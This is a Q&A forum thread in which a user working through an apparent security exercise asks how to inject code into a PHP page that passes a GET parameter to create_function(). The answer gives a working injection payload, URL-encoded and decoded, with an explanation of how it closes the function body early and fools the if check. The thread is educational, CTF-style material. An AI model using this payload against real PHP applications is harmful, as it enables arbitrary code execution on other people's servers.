0

I came across a site where you can do some excercises regarding cyber security.

From what I understand you have to do PHP injection. I looked online for examples but still I could not implement them.

Any help or tips would be appreciated, also if this is not the right place to ask this kind of questions please let me know.

The code:

<body> 
    <div class="corb-centered corb-php text-center"> 
      <h3> 
        <a target="_blank" href="/index.php?source">source</a> 
      </h3> 
      <h3> 
        Start here : <a href="/index.php?code=echo 'hello foobar';">Hello foobar</a> 
      </h3> 

      <div class="text-left"> 
        <h3>Output : </h3> 
        <pre><code><?php 
        if (isset($_GET['code'])) { 
          $new_func = create_function('', $_GET['code']); 
          if ($_GET['code'] === "echo 'hello foobar';") { 
            $new_func(); 
          } 
        } 
        ?></code></pre> 
      </div> 
    </div>     
</body>

I've tried everything I know:

ls']); $new_func();//
ls']); $new_func(); print('
ls; $new_func();//
ls''); $new_func();//
...
Improve this question
2
  • What is the problem exactly? Do you receive any errors? The create_function is deprecated, as of PHP 7.2.0. This may be the problem (info here). Alternatively, you could use eval() to execute the given query parameter, instead of transforming it to an anonymous function. Commented Jul 29, 2018 at 18:07
  • This isn't my own code, I was trying to bypass the if function and do code injection Commented Jul 29, 2018 at 19:39

1 Answer 1

Reset to default
2

According to the PHP docs:

Caution This function internally performs an eval() and as such has the same security issues as eval().

This is exactly what can be exploited in this case. PHP basically just glues function __lambda_func(<args>) {<code>} together and then evaluates it.

Using the following code parameter should output the string do something else...

/index.php?code=%7D%20%24_GET%5B%27code%27%5D%20%3D%20"echo%20%27hello%20foobar%27%3B"%3B%20echo%20%27do%20something%20else..%27%3B%20%2F%2F

Decoded version:

} $_GET['code'] = "echo 'hello foobar';"; echo 'do something else..'; //

Explained version:

}                                       # end the function body prematurely so the following code is executed immediately
$_GET['code'] = "echo 'hello foobar';"; # trick the IF check by overwriting what's actually in $_GET['code']
echo 'do something else..';             # any code that should be executed goes here
//                                      # comment out the function-body closing brace that is added by PHP after the code
Improve this answer
Sign up to request clarification or add additional context in comments.

3 Comments

Thank you very much, I was surpised it got answered so quickly. But I still have some questions if you don't mind. Where exactly is the code inserted we write. I was thought the code would trigger on this line "$new_func = create_function('', $_GET['code']);" so I trie to rewrite the function and execute it immediatly after but you do something else. I notice the bracket is very important char because without it won't work. How should I tackle such a excercise in the future because I spend quite lot of time on this. And last why should the string be encoded? Thanks
Yes it does trigger on that line because create_function() evaluates the function definition immediately. Solving these usually requires some knowledge about PHP's internals. In this case, looking at the relevant PHP source code has helped me solve this (PHP docs say that create_function() uses eval() internally).
I was able to solve the exercise thanks to this, thanks for helping me out!

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.